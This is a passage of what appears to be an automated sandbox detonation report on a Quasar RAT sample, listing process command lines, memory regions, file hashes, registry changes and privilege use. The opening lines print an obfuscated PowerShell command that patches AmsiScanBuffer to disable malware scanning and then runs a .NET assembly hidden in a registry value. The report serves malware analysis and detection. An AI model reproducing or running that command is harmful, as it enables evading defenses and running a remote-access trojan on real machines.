@([String])([IntPtr]);$ydlQGGQiFPBTjnofnvDiMD=ExuXadVNNRFQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$boQXxzygazq=$iGMJTHfuynbNu.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'M'+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'ne'+'l'+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$ovFlwlTxXvYHql=$ESFnyzonOYnuvF.Invoke($Null,@([Object]$boQXxzygazq,[Object](''+[Char](76)+'oa'+'d'+'Li'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$nVhyxEMbhwlVfqrmH=$ESFnyzonOYnuvF.Invoke($Null,@([Object]$boQXxzygazq,[Object](''+'V'+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$muQJipa=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ovFlwlTxXvYHql,$GOZdQgihxhNqCYyoaiL).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'');$nZIJPHsVYTwecqrLH=$ESFnyzonOYnuvF.Invoke($Null,@([Object]$muQJipa,[Object](''+[Char](65)+'ms'+'i'+''+'S'+''+[Char](99)+''+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$VeLgUixPhn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nVhyxEMbhwlVfqrmH,$ydlQGGQiFPBTjnofnvDiMD).Invoke($nZIJPHsVYTwecqrLH,[uint32]8,4,[ref]$VeLgUixPhn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nZIJPHsVYTwecqrLH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nVhyxEMbhwlVfqrmH,$ydlQGGQiFPBTjnofnvDiMD).Invoke($nZIJPHsVYTwecqrLH,[uint32]8,0x20,[ref]$VeLgUixPhn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+'F'+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+[Char](36)+''+[Char](115)+''+[Char](120)+''+'r'+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{92397549-46c5-4787-b476-16041ec213aa}

C:\Windows\System32\WaaSMedicAgent.exe

C:\Windows\System32\WaaSMedicAgent.exe 091a37bff28608854459ced4f55d3593 ttJfoed2rk2wwi8J3Oml9A.0.1.0.0.0

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 freegeoip.net udp

Files

memory/3212-0-0x0000000074B6E000-0x0000000074B6F000-memory.dmp

memory/3212-1-0x0000000005270000-0x00000000052A6000-memory.dmp

memory/3212-3-0x00000000058E0000-0x0000000005F08000-memory.dmp

memory/3212-2-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/3212-4-0x0000000005860000-0x0000000005882000-memory.dmp

memory/3212-5-0x0000000005F80000-0x0000000005FE6000-memory.dmp

memory/3212-6-0x0000000006160000-0x00000000061C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fytiajxw.io4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3212-16-0x0000000006210000-0x0000000006564000-memory.dmp

memory/3212-17-0x0000000006720000-0x000000000673E000-memory.dmp

memory/3212-18-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/3212-19-0x0000000007860000-0x00000000078A4000-memory.dmp

memory/3212-20-0x0000000007A20000-0x0000000007A96000-memory.dmp

memory/3212-21-0x0000000008120000-0x000000000879A000-memory.dmp

memory/3212-22-0x0000000007AC0000-0x0000000007ADA000-memory.dmp

memory/3212-23-0x0000000003120000-0x0000000003128000-memory.dmp

memory/3212-24-0x0000000007CF0000-0x0000000007D5E000-memory.dmp

memory/3212-25-0x000000000AD50000-0x000000000B2F4000-memory.dmp

memory/1460-27-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/1460-28-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/1460-29-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/1460-39-0x0000000007540000-0x0000000007572000-memory.dmp

memory/1460-40-0x0000000070900000-0x000000007094C000-memory.dmp

memory/1460-50-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/1460-52-0x0000000007590000-0x0000000007633000-memory.dmp

memory/1460-53-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/1460-51-0x0000000007520000-0x000000000753E000-memory.dmp

memory/1460-54-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/1460-55-0x0000000007730000-0x000000000773A000-memory.dmp

memory/1460-56-0x0000000007940000-0x00000000079D6000-memory.dmp

memory/1460-57-0x00000000078C0000-0x00000000078D1000-memory.dmp

memory/1460-58-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/1460-61-0x0000000074B60000-0x0000000075310000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 55d32bc1c206428fe659912b361362de
SHA1 7056271e5cf73b03bafc4e616a0bc5a4cffc810f
SHA256 37bd9078411576470f38bed628682d66786194692355541cd16f323e8f17c1ff
SHA512 2602abc70c0ed7e5ba63a3c7190015c2b30aa3223fbbe65fd9ddc001e84ab393bb172a9488dd988cd6368d668ab8608f85dc03cdb7c9561e904e3f7ce103485c

C:\Users\Admin\AppData\Roaming\Windows_Log_30.vbs

MD5 d327fc1e85765278c96ec5e456029ca3
SHA1 d256a8fa8485a7c9046a4d3c66f967683aa2db0a
SHA256 42bd8b3dfcde767a07aee069478e9300deaa4624a0127c0949ae9b1344850979
SHA512 1ff28f2d39be99cad57eecadaf884d900716af8ded573a3a4154b21465cef0be714445cc6d613e342dfe2d8cee7e7ea57986a9cb3008271ae813c1f1806a35f6

C:\Users\Admin\AppData\Roaming\Windows_Log_30.bat

MD5 d4c582bb5890af020c110f2b1de1d9db
SHA1 04c25b115c7bdaced94746c4acf9b5245f064ea0
SHA256 d34225f65c10acac82f381cf0f4281b2bc691afb2b72a1331acee94ca10e5c1c
SHA512 4b104fd0f62ecab38cc02b4cd77e6b8b5bcaaa3d98ad48f537fc7a67aa7d72d4575026921b63c9a743a41faaf3dd3154717bd6690f87dcb4114da05106b93012

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 3f3fe8249c2ca29ab46adc5d0a4c659c
SHA1 8d8ae1fc1213321c2507409c003dcf3abffa0188
SHA256 ed3935a99c94572ac955f26368b63c5bad7a5f64fd21347b0143eedfbb5e9d31
SHA512 7dabc109edd3d2bad284aa4d93e970634dfbe6b6141c3e332723f547ca75aeac42c38322e7948d425000be1f6ae429e9997a823a192849ade1554d4b4caf5a5e

memory/3212-79-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/3212-80-0x0000000074B60000-0x0000000075310000-memory.dmp

memory/2316-83-0x0000000007F40000-0x0000000007F9E000-memory.dmp

memory/2316-84-0x000000000A800000-0x000000000A892000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 b489b7d9efc807fb9583f21f39327fc2
SHA1 1ee42e6c08cd0a51d5c763c6b8771c004b962865
SHA256 6f1bc33cba78e569e98566aa17be4a548c9ed1a6ea0f35a2149ad504def56579
SHA512 53be2dc3574e1da8c643b24e6b982a19f6f2f4748acc38d5c625f66e701c1b4124156983c29668c8bed4c79b5f27d0f932c8a38ebecb33170c283f1161068c2e

memory/2316-92-0x0000000007D20000-0x0000000007D32000-memory.dmp

memory/4916-100-0x0000026BC0BF0000-0x0000026BC0C12000-memory.dmp

memory/4916-103-0x0000026BC2FF0000-0x0000026BC301A000-memory.dmp

memory/4916-105-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp

memory/4916-104-0x00007FF98C270000-0x00007FF98C465000-memory.dmp

memory/3000-109-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3000-113-0x00007FF98B450000-0x00007FF98B50E000-memory.dmp

memory/3000-111-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3000-112-0x00007FF98C270000-0x00007FF98C465000-memory.dmp

memory/3000-108-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3000-107-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3000-106-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3000-116-0x0000000140000000-0x0000000140008000-memory.dmp

memory/672-137-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/672-136-0x000001A852000000-0x000001A85202A000-memory.dmp

memory/64-157-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/512-167-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/512-166-0x000002837CAF0000-0x000002837CB1A000-memory.dmp

memory/512-161-0x000002837CAF0000-0x000002837CB1A000-memory.dmp

memory/64-156-0x000001A5719A0000-0x000001A5719CA000-memory.dmp

memory/64-151-0x000001A5719A0000-0x000001A5719CA000-memory.dmp

memory/952-147-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/952-146-0x000002CA3CB00000-0x000002CA3CB2A000-memory.dmp

memory/952-141-0x000002CA3CB00000-0x000002CA3CB2A000-memory.dmp

memory/672-131-0x000001A852000000-0x000001A85202A000-memory.dmp

memory/616-127-0x00007FF94C2F0000-0x00007FF94C300000-memory.dmp

memory/616-126-0x000001C6701F0000-0x000001C67021A000-memory.dmp

memory/616-121-0x000001C6701F0000-0x000001C67021A000-memory.dmp

memory/616-120-0x000001C6701F0000-0x000001C67021A000-memory.dmp

memory/616-119-0x000001C6701C0000-0x000001C6701E5000-memory.dmp

memory/2316-749-0x000000000B290000-0x000000000B29A000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-11 17:38

Reported

2024-06-11 17:44

Platform

win11-20240508-en

Max time kernel

300s

Max time network

243s

Command Line

winlogon.exe

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3300 created 644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Install.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3300 set thread context of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\36-7f-fe-0d-c3-13 C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\36-7f-fe-0d-c3-13\WpadDecision = "0" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\36-7f-fe-0d-c3-13\WpadDecisionTime = d85f57a926bcda01 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\36-7f-fe-0d-c3-13\WpadDecisionReason = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A
N/A N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
